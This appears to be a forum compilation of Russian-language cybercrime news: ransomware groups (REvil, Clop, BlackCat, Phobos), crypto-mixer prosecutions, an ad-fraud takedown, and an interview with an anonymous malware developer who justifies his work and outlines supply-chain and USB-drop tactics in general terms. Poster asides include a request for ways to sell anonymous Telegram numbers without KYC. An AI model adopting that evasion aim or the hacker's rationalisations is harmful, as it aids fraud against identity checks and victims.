Узнав об инциденте, разработчики Webroot включили двухфакторную аутентификацию для авторизации в консоли управления по умолчанию. Всех пользователей системы принудительно разлогинили, чтобы лишить злоумышленников доступа к скомпрометированным аккаунтам.
Однако о пресечении вредоносной кампании говорить пока рано. Точное количество пострадавших машин и компаний тоже еще не установлено.
По прогнозам экспертов «Лаборатории Касперского», атаки через цепочку поставок останутся одним из ключевых трендов ближайшего времени. Этот метод позволяет преступникам разом охватить большое количество жертв и доставить им полезную нагрузку без лишних подозрений.
Прогноз подтверждается: исследователи обнаружили уже несколько громких кампаний через поставщиков ПО и IT-услуг. В феврале злоумышленники взломали инфраструктуру MSP-провайдера, установив шифровальщик GandCrab 1500 его клиентам. Позже специалисты «Лаборатории Касперского» выявили масштабную атаку на сервис обновления ASUS, нацеленную как минимум на 600 компьютеров. Однако косвенными жертвами кампании стали десятки тысяч пользователей, которые также скачали вредоносный дистрибутив.
• Source: [https://www.darkreading.com/attacks...tools-to-distribute- ransomware/d/d-id/1335025](https://www.darkreading.com/attacks- breaches/attackers-exploit-msps-tools-to-distribute-ransomware/d/d-id/1335025)
• Source:
Администрация президента США Джо Байдена не знает, почему из даркнета исчезла
русскоязычная хакерская группа REvil.
США не знают причин прекращения деятельности инфраструктуры группы хакеров
REvil, однако продолжают настаивать на том, что Россия должна принять
необходимые меры по борьбе с киберпреступлениями. Об этом сообщила газета
Politico.
«Мы, безусловно, заметили, что хакеры REvil прекратили свою деятельность. Мы
точно не знаем, почему», — заявил высокопоставленный чиновник. Но мы по-
прежнему настаиваем, что Россия должна принять меры против киберпреступников,
действующих на ее территории» ,— сказал он.
В Вашингтоне также допустили, что к пропаже хакеров причастны российские власти.
19 июля агентство Bloomberg сообщило, что сайты, предположительно
принадлежащие хакерам из группировки REvil, отключены. При попытке посетить
сайт, на котором члены группировки обычно размещают свои заявления, появляется
оповещение о том, что эта страница не найдена. Агентство подчеркнуло, что
аналогичным образом ситуация обстоит и с другими ресурсами, связанными с
хакерами из REvil.
Подробнее:
https://www.securitylab.ru/news/522583.php
Стартовал процесс присоединения Украины к Объединенному центру передовых
технологий по киберобороне НАТО
Центр обеспечивает борьбу с кибератаками и киберзащиту информационных систем,
однако подключение займет время.
Об этом заявил посол Эстонии в Украине Каймо Кууск, сообщает Европейская правда.
Теперы опасней роботать в УКР
В Украине разоблачили группу организованных преступников, которые устраивали кибератаки на компании из Южной Кореи и университеты США. Своими действиями они нанесли ущерб на $500 миллионов.
До задержания киберпреступников были привлечены украинские, американские и южнокорейские правоохранители. Об этом сообщает Офис генпрокурора (ОГП), а в патрульной полиции НПУ показали кадры со спецоперации (чтобы посмотреть фото и видео, доскролльте новость до конца).
Следствием установлено, что группа лиц, которая действовала в Украине, еще в 2019 году атаковала вирусом-шифровальщиком под названием Clop четыре корейских компании. Это привело к блокированию 810 внутренних серверов и ПК работников.
Тогда как в этом году группировка атаковала и зашифровала персональные данные сотрудников, а также финансовые отчеты американский учебных заведений – Медицинской школы университета Стэнфорда, Университета Мэриленда и Университета Калифорнии.
За дешифрование информации хакеры получали "выкуп" в криптовалюте, а в случае неуплаты угрожали обнародовать конфиденциальные данные потерпевших.
15 июня в Киеве и области задержали членов этой хакерской группировки. В общей международной спецоперации были задействованы специалисты департаментов патрульной и киберполиции Украины, Главного следственного управления НПУ, правоохранители из США и Республики Корея.
Они прекратили работу инфраструктуры, с которой осуществлялось распространение вируса, а также заблокировали каналы легализации криптовалюты, полученной преступным путем.
Во время 24 обысков на Киевщине по месту жительства шести членов группы правоохранители обнаружили и изъяли компьютерную технику, 8 автомобилей, почти $58 тыс., €3000, более 1,5 млн гривен наличных, а также документацию по доказательствами противоправной деятельности.
Действия киберпреступников квалифицированы по ч. 2 ст. 361, ч. 2 ст. 209 УК Украины. Сейчас идут следственные и иные процессуальные действия, направленные на привлечение к ответственности лиц, причастных к противоправной деятельности.
В даркнете — скрытой анонимной сети, которую используют для координации хакеры со всего мира — основным языком остается русский. Возможно, именно поэтому вокруг киберпреступников из России в западных медиа сложилось множество мифов: их обвиняют в масштабных атаках на США и в работе на российские спецслужбы — последнее утверждение подкрепляют тем, что действия силовиков почти никак не препятствуют успешным атаками на компании со всего мира. «Ленте.ру» удалось связаться с одним из так называемых «русских хакеров», работавшим с крупнейшими мировыми сообществами. На условиях анонимности он рассказал о том, как сегодня распределено влияние между группировками, как изменились тактики киберпреступников, а также о сложности жизни вне закона.
«Практика властей США смешит многих»
«Лента.ру»: Наш разговор происходит на фоне сообщений о воскрешении группировки REvil, которую на Западе безапелляционно связывают с Россией. Ей приписывают атаки на крупные американские компании, а вместе с этим — сотрудничество с российскими спецслужбами. Ты сотрудничал с REvil? Обоснованны ли подобные обвинения?
Antivirus: В нормальном мире меня бы назвали фрилансером: я не вхожу на постоянной основе ни в одно объединение, но выполняю некоторые задачи для многих сообществ, которые журналисты считают известными. Сам факт того, что я даю кому-то интервью, вряд ли понравится моим заказчикам, именно поэтому я скрываюсь за ничего не говорящим ником. Среди таких заказчиков была и группа REvil.
Выполняя какую-то работу, ты не всегда знаешь, кто на самом деле ставит задачу. Но практика властей США назначать виновных смешит многих. Есть китайские группировки, которые годами проходят во всех СМИ как связанные с властями страны, которые якобы чуть ли не физически сидят на их китайской Лубянке. Но внутри тусовки все догадываются, что это простые ребята, разбросанные по всему миру, у которых даже между собой затрудненные коммуникации, не то что с правительством.
Конечно, ничего нельзя исключать. Но лично у меня нет ощущения, что российские спецслужбы планируют какие-то атаки.
Другой мой источник считает, что REvil пропадали с радаров из-за повышенного интереса со стороны властей США.
Многие так или иначе сталкивались с пользователем Unknown, который был официальным рупором группировки в даркнете. Он пропал этим летом, о его судьбе ничего не известно. Существует версия, что американцам удалось узнать, кто это, после чего эти данные были переданы российским силовикам. Это возможно.
Но иногда банан — это просто банан. Человек мог слечь с коронавирусом, попасть в ДТП или просто уйти из бизнеса.
Из этого бизнеса уходят?
Это же не мафия. Плюс ты аноним. Когда ты хочешь уйти из бизнеса, ты просто нажимаешь на кнопку выключения ноутбука.
«Не чувствую себя Робин Гудом»
Давай разберемся: насколько прибыльна киберпреступность и что должно случиться в жизни человека, чтобы он решил ее оставить?
Скажем так: это работа, которая отнимает очень много времени. И если ты заработал достаточно, то ты можешь выйти из игры. Хроническая усталость, выгорание, дедлайны — все эти слова из жизни обычных офисных работников актуальны и для разработчиков вредоносного ПО.
И тут играют роль два фактора. С одной стороны, ты все время боишься. Ты просыпаешься в страхе, ты ложишься спать в страхе, ты прячешься за маской и капюшоном в магазине, ты скрываешься даже от своей жены или девушки. Я младше тебя, но я уже заработал на всю оставшуюся жизнь. Не миллионы, но хватит, чтобы спокойно жить и никогда не работать. И тут второй фактор: как бросить работу, которая приносит такой заработок, в стране, где тебя не сказать что сильно ищут?
Представители LockBit говорили в интервью, что не могут нормально спать. Это правда?
Да, сон очень плохой. Я стабильно сплю четыре-пять часов уже много лет. Но тут больше проблема в том, что днем у тебя семья, а работа вся по ночам, плюс часовые пояса.
В доковидное время не было соблазна переехать в Европу или куда-то еще?
Если наступит какой-то момент, когда мне нужно будет собирать рюкзак и первым рейсом бежать из страны, — я это сделаю. Но сейчас мне комфортно.
Патриотизм — обычная история среди киберпреступников?
Это не сообщество, в котором можно провести опрос. Понятно, что есть какие-то площадки для найма фрилансеров и обмена мнениями, где еще и постят новости. Но каждый человек моей профессии живет без связи с комьюнити. Я не знаю, что в голове у моего работодателя, как и он не знает о том, что в моей.
Но если попытаться отвечать глобально, то я вижу, что в интервью многих соратников, даже из той же группировки LockBit, сквозит скорее тема социального равенства. Если вы зайдете на итальянские форумы в даркнете, то там больше пишут про социализм, чем про взломы.
Мне и самому близка эта идея. Мир несправедлив к слабым, все построено на финансовой выгоде. Есть люди, которые возглавляют крупнейшие корпорации просто по праву рождения. В лучшем случае они скидывают сотые доли процента от своих сверхприбылей на благотворительность, за что их обожествляют руками их личных пиарщиков. В худшем они прячут свои миллиарды от налоговых служб. Так быть не должно, но так происходит не только в США или Европе, но и в России.
Чувствуешь себя Робин Гудом?
Честно? Нет. И я против романтизации своей работы. В том числе моими руками крадут или вымогают деньги. Но мне не стыдно за то, чем я занимаюсь. Я искренне стараюсь найти хоть что-то плохое в этом и не могу. Наверное, у меня как-то смещены понятия о том, что такое хорошо и что такое плохо. Но в таком случае они смещены у многих в этой профессии.
Многие группировки заявляют в своих блогах, что они не атакуют социальные объекты. Твои разработки когда-нибудь использовались в подобных целях?
Насколько мне известно, нет.
«Для точечных атак иногда придумывают элегантные решения»
У тебя, как и у многих твоих коллег, яркая социалистическая риторика. Можно ли предположить, что пусть не всегда, но хотя бы изредка американские компании атакуют именно из-за того, что они капиталисты?
Во-первых, их атакуют потому, что они богатые и у них много денег. Мне сложно себе представить атаку, продиктованную идеологическими причинами. Во-вторых, киберпреступность — это международное явление, а сами сообщества интернациональны. В этом году я работал с фрагментами кода по заказу сообщества, переписку с которым я вел на русском языке. А в коде были комментарии на французском.
Если чуть углубляться в специфику атак, то какие направления сейчас считаются наиболее перспективными и какие защитные инструменты причиняют наибольшие неудобства разработчикам вредоносного ПО?
Мне кажется, тут я не расскажу ничего нового. Основную массу атак можно сравнить с автоматизированной спам-рассылкой. Кого зацепит — того и будут «доить». Именно поэтому у каждой группировки такая география поражения: от крепких европейских компаний до вьетнамского или камбоджийского среднего и даже малого бизнеса.
Иногда атакуется конкретная компания. Здесь тактика меняется в зависимости от цели. Я где-то читал историю о том, как ребята несколько лет не могли попасть внутрь периметра безопасности (условная граница между внешним миром и внутренними системами компании — прим. «Ленты.ру») крупной корпорации и придумали элегантное решение. Они начали подбрасывать к офису этой компании флешки с ее логотипами, чтобы кто-нибудь из сотрудников подумал, что его коллега потерял важные документы, и вставил флешку в компьютер в попытке узнать, чья она. После этого должен был запуститься вредоносный код, который мгновенно распространялся по внутренней сети. Не помню, чем история закончилась.
В таких ситуациях в современном мире атакуют не саму компанию, а небольшие организации из ее цепочки поставок. Скажем, атакуют не банк, а производителя незначительного программного обеспечения, закрывающего минорную задачу. Сейчас это самый популярный способ точечных атак, который помогает обойти традиционные средства защиты и проникнуть внутрь периметра безопасности.
Стратегия наших условных противников — департаментов по информационной безопасности — сегментация сети по принципу нулевого доверия (при таком подходе инфраструктура делится на множество изолированных маленьких частей. Если происходит заражение одной из них, остальные элементы сети остаются в безопасности. При этом ни один из этих элементов не считается в компании безопасным — прим. «Ленты.ру»). Об этом сейчас говорят все безопасники, но тактика пока не доведена до идеала.
Сервисная модель потребления вредоносного ПО (при которой можно брать разработки хакеров в аренду, что делает киберпреступления более доступным и массовым видом деятельности — прим. «Ленты.ру») уже доминирует в даркнете?
Пока нет, но это вопрос времени. Удобный подход.
«Атаки на корпорации могут спровоцировать геополитический конфликт»
BlackMatter несколько дней назад нанесли удар по японскому гиганту Olympus. До этого они говорили, что считают себя лидерами хакерского сообщества. Возрождение REvil помешает их планам?
Честно говоря, я не составляю такие рейтинги [лидерства] для себя. Да и никто не составляет. Как ты себе это представляешь?
Вместе с REvil из даркнета пропала группировка DarkSide, ответственная за атаку на Colonial Pipeline. Существует теория о том, что BlackMatter и DarkSide — это одно и то же сообщество. Это так?
Думаю, да. Хотя я не уверен, что для кого-то, кроме журналистов и силовиков, это принципиально.
Многие заметили, что в первом же интервью BlackMatter пообещали не атаковать объекты американской инфраструктуры. Было похоже на белый флаг — мол, ребята, мы больше так не будем.
Возможно, и так, но это неважно. BlackMatter просто зарабатывают деньги, и им не хочется привлекать к себе внимания. Можно один раз сорвать куш, но спровоцировать такой геополитический конфликт, что тебя быстро найдут. Лучше спокойно получать стабильные небольшие суммы от компаний средней величины, лишь изредка заходя в такие корпорации, как Olympus.
В Санкт-Петербурге задержали белоруса Сергея Павловича, пишет "Фонтанка" со ссылкой на "Агентство журналистских расследований".
По данным издания, 38-летний Павлович прилетел в Петербург 30 октября и должен был улететь 1 ноября. Как утверждается, он был задержан сотрудниками петербургского бюро Интерпола по запросу США по делу о краже персональных данных – по этому делу в 2016 году 20 лет тюрьмы получил основатель международной группы хакеров ShadowCrew Альберт Гонсалес. Павловича в США обвиняют в организации передачи и распространении устройств несанкционированного доступа.
Первомайский районный суд Минска ранее приговорил его к 10 годам колонии строгого режима с конфискацией имущества. Он был признан виновным в краже 36 миллионов долларов с банковских карточек пользователей разных стран, сообщает белорусская служба Радио Свобода.
После освобождения в 2015 году мужчина занялся бизнесом и написал книгу "Как я украл миллион. Исповедь раскаявшегося кардера", в которой он призывает других не идти по его пути. Он заявлял, что передал все деньги Республиканскому научно-практическому центру детской онкологии, гематологии и иммунологии в Минске.
Новость не нова, и прошла очень тихо. Но, прозвучала фраза обсуждали "вопросы кибербезобазности". Это очередной звоночек для "крипто-бизнесменов" теперь которые находятся в ру. Просто имейте ввиду...
Ссылка: <https://news.rambler.ru/politics/47515606-direktor-tsru-priehal-v- rossiyu-s-zagadochnoy-missiey/>
Аналитики из [Recorded Future](https://support.recordedfuture.com/hc/en- us/articles/4412359150739?__hstc=156209188.3ef598c77f0fcaaf2d58045f9a8ece00.1625723961733.1639077951769.1639140106581.394&__hssc=156209188.6.1639140106581&__hsfp=2884270500) и MalwareHunterTeam обнаружили шифровальщика ALPHV (он же BlackCat). Исполняемый файл вымогателя написан на Rust, что нетипично вредоносных программ, но такой подход постепенно набирает популярность среди киберпреступников из-за высокой производительности и безопасности памяти.
Сами разработчики вредоноса называют его ALPHV и активно продвигают свою малварь на русскоязычных хак-форумах. Однако из-за того, что на сайте злоумышленников используется икнока, с изображением черного кота, исследователи окрестили вредоноса BlackCat.
[](https://xakep.ru/wp- content/uploads/2021/12/367589/darkweb-promotion.jpg)
Технически этот вымогатель является уже третьим шифровальщиком, написанным на Rust: в 2020 году на GitHub был опубликован PoC-вредонс такого рода, и в том же году был замечен уже неработающий вымогатель [BadBeeTeam](https://id-ransomware.blogspot.com/2020/09/badbeeteam- ransomware.html). Однако исследователи пишут, что на их фоне ALPHV (BlackCat) выглядит первой профессиональной RaaS-малварью, ориентированной на корпоративные взломы и шифрование устройств. Так, в своем недавнем твите известный ИБ-специалист и аналитик Emsisoft Майкл Гиллеспи, охарактеризовал BlackCat как «очень сложный» шифровальщик.
По мнению специалистов Recorded Future, создатель ALPHV (BlackCat) ранее был участником известной хакерской группировки REvil. С начала декабря этот человек (известный под ником ALPHV) рекламирует RaaS на подпольных форумах (XSS и Exploit), приглашая других преступников присоединиться к вымогательским атакам на крупные компании. Злоумышленник заявляет, что малварь может шифровать данных в системах под управлением Windows, Linux и VMware ESXi, а партнеры будут получать от 80% до 90% окончательного выкупа, в зависимости от общей суммы, которая будет получена от жертв.
Пока экспертам неизвестно, как именно вредонос проникает в системы жертв, но, как и большинство других вымогательских групп, операторы ALPHV (BlackCat) занимаются двойным вымогательством. То есть перед шифрованием файлов хакеры ищут в сети жертвы конфиденциальные данные, похищают их, а затем требуют выкуп, в противном случае угрожая опубликовать украденное в открытом доступе (или продать заинтересованным лицам).
В настоящее время группировка, похоже, управляет сразу несколькими «сайтами утечек», на каждом из которых хранятся данные одной или двух жертв. Скриншот одного из таких сайтов можно увидеть ниже. Похоже, эти сайты обслуживаются самими партнерами группы, что объясняет разные URL-адреса.
[](https://xakep.ru/wp- content/uploads/2021/12/367589/BlackCat-leak-site.png)
Издание Bleeping Computer сообщает, что с ноября 2021 года жертвами этого вымогателя стали уже многие компании в США, Австралии и Индии. Собственные источники журналистов говорят, что размер выкупа варьируется от 400 000 до 3 000 000 долларов США (в биткоинах или Monero). Если жертвы платят биткоинами, к выкупу добавляется дополнительная комиссия в размере 15%.
[](https://xakep.ru/wp-
content/uploads/2021/12/367589/BlackCat-ransom.png)
источник:xakep.ru
ФБР, Google и 20 представителей отрасли кибербезопасности совместными усилиями ликвидировали крупную киберпреступную сеть, занимавшуюся мошенничеством с рекламой. За четыре года мошенникам удалось заработать миллионы долларов на подделке кликов и фальшивых просмотрах рекламы.
В результате скоординированных действий специалистам удалось отключить несколько использовавшихся преступниками ботнетов. Кроме того, восьми подозреваемым были предъявлены обвинения по 13 пунктам. Трое обвиняемых находятся под арестом и ожидают экстрадиции в США.
Согласно обвинительному заключению Министерства юстиции США и отчету , подготовленному экспертами Google и White Ops, восемь подозреваемых являются главными участниками мошеннической схемы под кодовым названием 3ve. Шестеро обвиняемых являются гражданами России, а еще двое – гражданами Казахстана. Специалисты в области ИБ и маркетинга следили за активностью киберпреступной сети в течение года, а сама она работала как минимум с 2014 года.
По данным следствия, за время активности 3ve мошенники испробовали различные методы «накрутки» кликов и просмотров рекламы. В частности они арендовали ботнеты у других киберпреступников, создавали собственные ботнеты с использованием коммерческих дата-центров, взламывали блоки IP-адресов, использовали прокси для сокрытия настоящих IP-адресов и даже создавали web- сайты для отображения рекламы, чтобы у ботов было что загружать и на что кликать.
В зависимости от используемых методов эксперты разделили 3ve на три подгруппы. Группа 3ve.1 использовала ботнеты (в частности MethBot, также известный как Miuref и Boaxxe). Когда рекламные сети стали блокировать связанные с ботнетами IP-адреса, 3ve.2 взяла на вооружение ботнет, распространяющий вредоносное ПО Kovter. Подгруппа 3ve.3 действовала подобно 3ve.1, но использовала меньше ботов и не взламывала IP-адреса, а арендовала серверы в дата-центрах.
• Source: justice[.]gov/usao-edny/press-release/file/1114576/download
• Source: services.google.com/fh/files/blogs/3ve_google_whiteops_whitepaper_final_nov_2018.pdf
Министерство юстиции США обнародовало обвинения против 42-летнего российского гражданина Евгения Птицына , которому инкриминируется руководство продажами, распространением и операциями, связанными с программой-вымогателем Phobos. Птицын впервые предстал перед судом США в Окружном суде США по округу Мэриленд 4 ноября после экстрадиции из Южной Кореи. Phobos , с помощью её аффилиатов, нанесла ущерб более чем 1,000 государственным и частным организациям в США и по всему миру, вымогая выкупы на сумму более $16 миллионов.
Заместитель Генерального прокурора Лиза Монако заявила: «Министерство юстиции привержено использованию всех международных партнерских связей для борьбы с угрозами, которые представляет собой программа-вымогатель, такая как Phobos. Евгений Птицын якобы вымогал миллионы долларов у тысяч жертв и теперь предстанет перед правосудием в США благодаря упорной работе и находчивости правоохранительных органов по всему миру — от Республики Корея до Японии, Европы и, наконец, до Балтимора, Мэриленд. Вместе с нашими партнерами по всему миру мы будем продолжать привлекать киберпреступников к ответственности и защищать невинных жертв ».
**«Phobos атаковал школы, больницы и критическую инфраструктуру»
Николь М. Арджентьери**, главный заместитель помощника Генерального прокурора и глава Уголовного отдела Министерства юстиции, заявила: «Птицын и его соучастники управляли группой, распространяющей программу-вымогатель Phobos, члены которой атаковали более 1,000 жертв по всему миру». По её словам, злоумышленники атаковали не только крупные корпорации, но и школы, больницы, некоммерческие организации и даже федерально признанное племя , вымогая более $16 миллионов.
Прокурор США для округа Мэриленд Эрик Л. Баррон подчеркнул: «Это лишь вопрос времени, киберпреступники будут пойманы и привлечены к ответственности». Он добавил, что обвинение против Птицына свидетельствует о приверженности офиса прокурора США для округа Мэриленд привлечению киберпреступников к правосудию и сотрудничеству с частным сектором и академическим сообществом для предотвращения их деятельности.
Согласно обвинительному заключению, с ноября 2020 года Птицын и другие вступили в сговор с целью проведения международной схемы компьютерного взлома и вымогательства, которая наносила ущерб организациям по всему миру с помощью Phobos.
Птицын и его соучастники разрабатывали и предоставляли доступ к Phobos другим преступникам или «аффилиатам», которые использовали его для шифрования данных жертв и вымогательства выкупов. Они управляли сайтом в даркнете, где координировали продажи и распространение Phobos , и использовали онлайн- псевдонимы, такие как «derxan» и «zimmermanx» , чтобы рекламировать свои услуги на криминальных форумах.
Аффилиаты проникали в сети жертв, часто используя украденные или незаконно полученные учетные данные, похищали данные и шифровали их с помощью Phobos. После шифрования злоумышленники требовали выкупы через записки и коммуникации с жертвами, угрожая обнародовать похищенные файлы, если выкуп не будет выплачен.
После успешных атак аффилиаты платили Птицыну за ключи дешифровки, переводя средства в уникальные криптовалютные кошельки. С декабря 2021 года по апрель 2024 года платежи переводились в кошелек, контролируемый Птицыным.
Птицын обвиняется по 13 пунктам , включая сговор с целью совершения мошенничества с использованием средств связи, компьютерного мошенничества и вымогательства. Если его вина будет доказана, ему грозит до 20 лет тюрьмы за каждый пункт обвинения в мошенничестве и до 10 лет тюрьмы за каждый пункт компьютерного мошенничества.
ФБР и Министерство юстиции выразили благодарность партнерам из Южной Кореи , Европола , а также правоохранительным органам Японии, Великобритании, Испании, Франции и других стран за содействие в экстрадиции и расследовании.
Совет по исламской идеологии Пакистана заявил что использование VPN для доступа к заблокированным ресурсам противоречит шариату, в связи с чем правительство внедряет национальный файрвол.
Критики уверены, что такие меры усилят онлайн-наблюдение, ограничат свободу слова и негативно повлияют на электронную коммерцию.
voanews.com/a/pakistani-religious-body-declares-using-vpn-is-against-islamic- law-/7865991.html
Теперь, чтобы купить анонимный номер для Telegram нужно пройти верификацию по паспорту, а также указать номер телефона — российский не подойдёт.
Есть идеи как продать без KYC? Давно покупал, но не думал что эта помойка так скатится и добавит куц, теперь даже продать не могу...
Компания столкнулась с шантажом и угрозами после утечки данных.
Крупная букмекерская компания 1win столкнулась с серьезной утечкой пользовательских данных. По информации от основателя компании, злоумышленникам удалось получить доступ к части базы данных, содержащей электронные адреса и телефонные номера около 100 миллионов пользователей.
Атаке предшествовала серия масштабных DDoS-нападений, которые оказались настолько мощными, что с ними не справлялся даже провайдер защиты от DDoS. После первой волны атак последовали попытки проникновения в инфраструктуру компании различными способами: рассылка вирусов сотрудникам для получения паролей от серверов, множественные атаки на инфраструктуру, а также успешный взлом одного из мерчантов.
Несмотря на активное усиление отдела информационной безопасности, злоумышленники обнаружили и использовали существующую уязвимость в системе. Хакеры потребовали выкуп за похищенные данные, изначально запросив 1 миллион долларов. В ходе переговоров сумма возросла до 15 миллионов долларов, при этом условия постоянно менялись.
«Шантажисты решили выложить часть базы и начать информационное давление для получения большей суммы денег», — сообщил основатель 1win. По его словам, злоумышленники используют различные методы давления через СМИ с целью нанесения репутационного ущерба компании.
Руководство 1win подчеркивает, что на данный момент инфраструктура компании находится в полной безопасности.
t.me/owner1w/279
t.me/dataleak/3407
Власти США арестовали и [предъявили обвинения](https://www.documentcloud.org/documents/6775811-Harmon-Helix- Indictment.html) 36-летнему Ларри Хармону из Огайо. Его обвиняют в организации работы криптовалютного миксер-сервиса Helix, функционировавшего в даркнете и помогавшего преступникам скрывать происхождение транзакций с биткоинами. Подобные сервисы помогают «запутать следы», превращая простой перевод средств с одного аккаунта на другой в сложную схему: вместо одной транзакции сервис разбивает нужный платеж на сотни или тысячи мелких переводов, которые отправляются на разные аккаунты и проходят через множество кошельков, прежде чем достигнут цели.
«Единственная цель операций Хармона состояла в том, чтобы скрыть криминальные транзакции в даркнете от правоохранительных органов, но благодаря нашему растущему опыту в данной области, ему не удалось сдержать свои обещания», — гласит пресс-релиз Минюста.
Click to expand...
По данным правоохранителей, Helix был для Хармона лишь второстепенным проектом, связанным с его главным сервисом Grams — поисковой системой, которая индексировала множество связанных с наркотиками маркетплейсов в даркнете. Grams позволял пользователям искать наркотики и находить самые выгодные предложения. Helix, в свою очередь, был лишь дополнением и предлагал потенциальным покупателям способ скрыть свою личность при покупке.
Минюст сообщает, что Хармон управлял Helix с 2014 по 2017 годы, и через его сервис было отмыто 354 468 биткоинов, чья стоимость на момент совершения транзакций составляла около 300 миллионов долларов, а на сегодняшний день уже приближается к 3,5 миллиардов долларов.
По мере развития сервиса Хармон сотрудничал с другими сервисами в даркнете. В частности, согласно обвинительному заключению, он работал с крупнейшей торговой площадкой того времени, AlphaBay, и AlphaBay рекомендовала своим пользователям Helix в качестве безопасного и надежного миксер-сервиса для биткоинов.
За все операции Helix Хармон взимал комиссию в размере 2,5%. В итоге правоохранительные органы теперь стремятся не только посадить Хармона в тюрьму, но и конфисковать у него три объекта недвижимости, которые подозреваемый купил на денежные средства незаконного происхождения.
Возбужденное против Ларри Хармона дело – это первый случай, когда власти США занялись преследованием миксер-сервиса.
Напомню, что в 2017 году один из крупнейших и популярнейших на тот момент миксер-сервисов в мире, BitMixer, неожиданно объявил о прекращении работы. Это произошло вскоре после закрытия правоохранительными органами маркетплейсов AlphaBay и Hansa, а также после ареста Александра Винника и ухода в оффлайн BTC-e. В своем прощальном послании администраторы BitMixer писали, что подобные сервисы всегда популярны среди киберпреступников и отмечали, что «очень скоро подобная деятельность будет расцениваться как незаконная в большинстве стран».
Введение понятия bug bounty в правовое поле может быть отложено.
Принятие законопроекта о "белых хакерах", предлагающего ввести понятие bug bounty в правовое поле и изменения в Уголовный кодекс, может быть отложено из- за недовольства ФСБ и ФСТЭК. Об этом пишет издание "Ведомости" со ссылкой на источники в компаниях по кибербезопасности и собеседников, знакомых с ходом обсуждения законопроекта.
Минцифры с лета 2022 года пытается ввести в правовое поле понятие bug bounty. По данным одного из собеседников из компании по кибербезопасности, законопроект предполагает внесение изменений в статью 272 Уголовного кодекса о неправомерном доступе к компьютерной информации. Максимальное наказание по этой статье составляет семь лет лишения свободы. Ответственность наступает, если незаконный доступ повлек за собой модификацию и копирование компьютерной информации.
Однако продвижение законопроекта в существующем виде приостановлено из-за позиции ФСБ и ФСТЭК. Согласно источнику из газеты, эти ведомства выступают против либерализации положений Уголовного кодекса и высказывали соответствующую позицию на одном из рабочих совещаниях по законопроекту.
Издание направило запросы в оба ведомства, в Минцифры от комментариев отказались.
Другой источник указывает, что позицию ФСБ и ФСТЭК выражали их сотрудники на рабочих совещаниях по законопроекту в Минцифры. Как утверждает один из собеседников, грань между уголовно наказуемыми действиями и легальными «очень зыбкая», а «менять УК никто не будет».
Издание также сообщает, что сейчас вознаграждения за поиск уязвимостей в информационных системах предлагаются тремя российскими компаниями: Positive Technologies, "Синклит" и BI.ZONE. Представитель Positive Technologies Артем Сычев подчеркнул, что законопроект позволит "активизировать тех исследователей, которые опасаются каких-либо правовых последствий", а компания участвует в его обсуждении.
Технический директор компании "Синклит" Лука Сафонов также выразил мнение, что хотя его компания не участвовала в обсуждении инициативы о "белых хакерах", законопроект, направленный на их регулирование, определенно необходим. Он отметил, что помимо уголовной статьи 272 УК, "белые хакеры" также могут столкнуться с наказанием по статье 273 УК ("Создание, использование и распространение вредоносных компьютерных программ"). Сафонов считает, что инициатива может встретить противодействие силовых ведомств «в части возможной легализации компьютерных преступлений». По его словам, законопроект может не устроить и самих пентестеров — в случае, если потребует от исследователей выйти из тени, к чему многие из них определенно не готовы.
Адвокат Максим Маценко, руководитель уголовной практики Vinder Law Office, считает, что проблем с уязвимостью "белых хакеров" не существует. Он объясняет, что участие хакера в программе по поиску уязвимостей за деньги предполагает, что компании, участвующие в проекте, добровольно предоставляют свои сети для поиска уязвимостей, что полностью исключает уголовную ответственность при условии, что хакер не выходит за пределы своих прав.
source: vedomosti.ru/technology/articles/2023/03/27/968188-zakonoproekt-o- belih-hakerah-vizval-voprosi-u-silovikov?from=newsline
Кирилл Хайкин пишет про парфюмерию, у него в телеграм-канале больше 34 тысяч подписчиков. Сегодня Хайкин подал заявление на регистрацию блога — с 1 ноября владельцы страниц в социальных сетях с аудиторией более 10 тысяч человек должны передавать данные о себе в РКН.
Через 6 часов после регистрации Хайкину пришла электронная повестка. Сам блогер написал, что, возможно, это совпадение, но ситуация всё равно очень интересная.
«За меня не волнуйтесь, я окончил военную кафедру», — резюмировал Хайкин.
Правоохранительные органы США арестовали гражданина России и Швеции по обвинению в отмывании почти $336 млн за десять лет через сервис микширования Bitcoin Fog.
Согласно публичным судебным документам, федеральные агенты США арестовали гражданина России и Швеции Романа Стерлингова по трем обвинениям, связанным с его предполагаемой причастностью к сервису микширования биткоинов Bitcoin Fog. Стерлингов обвиняется в проведении нелицензированных денежных переводов, отмывании денег и управлении сервисом денежных переводов без лицензии.
Как заявил специальный агент по уголовным расследованиям Налоговой службы США (IRS) Девон Беккет, Bitcoin Fog позволяет клиентам совершать транзакции BTC, скрывая отправителя. Сервис был запущен в 2011 году и предположительно использовался для перевода около 1.2 млн BTC – примерно $335.8 млн, исходя из стоимости криптоактива на момент совершения транзакций.
Прокуратура предполагает, что через сервис прошли BTC с рынков даркнета Silk Road, Evolution, AlphaBay, Agora и Silk Road 2.0, а также BTC, украденные с криптовалютных бирж. Bitcoin Fog не был зарегистрирован в Сети по борьбе с финансовыми преступлениями (FinCEN) в качестве компании по предоставлению сервисов денежных переводов и не имеет лицензии на ведение деятельности в Вашингтоне.
Федеральные агенты использовали инструменты анализа блокчейна, чтобы определить количество прошедших через сервис биткоинов, а также некоторые источники BTC.
«Хотя личность владельца адреса биткоина, как правило, анонимна, правоохранительные органы часто могут идентифицировать владельца конкретного адреса, анализируя блокчейн», – сказал Беккет.
Агент IRS провел транзакцию на Bitcoin Fog и убедился, что это сервис микширования BTC. Как утверждает Беккет, вторая транзакция была связана с продажей наркотиков и также была отправлена через сервис.
«Анализ транзакций биткоина, финансовых отчетов, записей интернет-провайдеров, данных электронной почты и дополнительной исследовательской информации идентифицирует Романа Стерлингова как основного оператора Bitcoin Fog», – сказал Беккет.
Следователи также связали Стерлингова с доменом Bitcoin Fog через платеж, проведенный на Liberty Reserve. Правоохранители идентифицировали принадлежащие Стерлингову счета MtGox, к которым ответчик получал доступ с тех же IP- адресов, которые использовались для аккаунта Liberty Reserve.
• Source: https://www.courtlistener.com/recap/gov.uscourts.dcd.230456/gov.uscourts.dcd.230456.1.1_1.pdf
• Source: <https://www.courtlistener.com/docket/59856080/5/united-states-v- sterlingov/>
Ночью с 28-го на 29-е октября Telegram устроил виртуальный «налет» на группу
RGT: команда мессенджера заблокировала их чат с десятками тысяч участников и
рабочего бота. Некоторые аккаунты администраторов также попали под бан с
пометкой SCAM.
Скорее всего, чтобы избежать новых блокировок, руководство группы изменило
название основного канала , убрав имя сообщества. Группа уже открыла новый
чат, но активность там временно ограничена, так как модераторов забанили.
